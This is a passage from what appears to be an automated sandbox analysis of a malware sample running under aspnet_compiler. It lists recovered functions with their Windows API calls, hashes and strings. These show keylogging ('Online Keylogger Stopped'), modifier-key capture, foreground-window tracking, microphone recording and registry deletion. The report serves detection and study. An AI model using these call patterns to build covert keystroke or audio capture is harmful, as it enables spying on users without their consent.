                                                                          • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                          • String ID: Online Keylogger Stopped
                                                                          • API String ID: 1623830855-1496645233
                                                                          • Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                                          • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                          • Opcode Fuzzy Hash: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                                          • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                          APIs
                                                                          • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                          • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: wave$BufferHeaderPrepare
                                                                          • String ID: T=G
                                                                          • API String ID: 2315374483-379896819
                                                                          • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                          • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                          • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                          • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                          APIs
                                                                          • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LocaleValid
                                                                          • String ID: IsValidLocaleName$j=D
                                                                          • API String ID: 1901932003-3128777819
                                                                          • Opcode ID: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                                          • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                          • Opcode Fuzzy Hash: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                                          • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID: T=G$T=G
                                                                          • API String ID: 3519838083-3732185208
                                                                          • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                          • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                          • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                          • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                          APIs
                                                                          • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                            • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                            • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                            • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                            • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                            • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                            • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                            • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                          • String ID: [AltL]$[AltR]
                                                                          • API String ID: 2738857842-2658077756
                                                                          • Opcode ID: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                                          • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                          • Opcode Fuzzy Hash: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                                          • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00448825
                                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorFreeHeapLast_free
                                                                          • String ID: `@$`@
                                                                          • API String ID: 1353095263-20545824
                                                                          • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                          • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                          • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                          • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                          APIs
                                                                          • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: State
                                                                          • String ID: [CtrlL]$[CtrlR]
                                                                          • API String ID: 1649606143-2446555240
                                                                          • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                                          • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                          • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                                          • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                          APIs
                                                                          • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000002,00000000,80000001,J@4fF,00412951,00000000,00000000,J@4fF,?,00000000), ref: 00412988
                                                                          • RegDeleteValueW.ADVAPI32(00000000,?,?,00000000), ref: 00412998
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeleteOpenValue
                                                                          • String ID: J@4fF
                                                                          • API String ID: 2654517830-1060276034
                                                                          • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                          • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                          • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                          • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                          • GetLastError.KERNEL32 ref: 0043FB02
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1717984340-0
                                                                          • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                          • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                          • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                                          • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759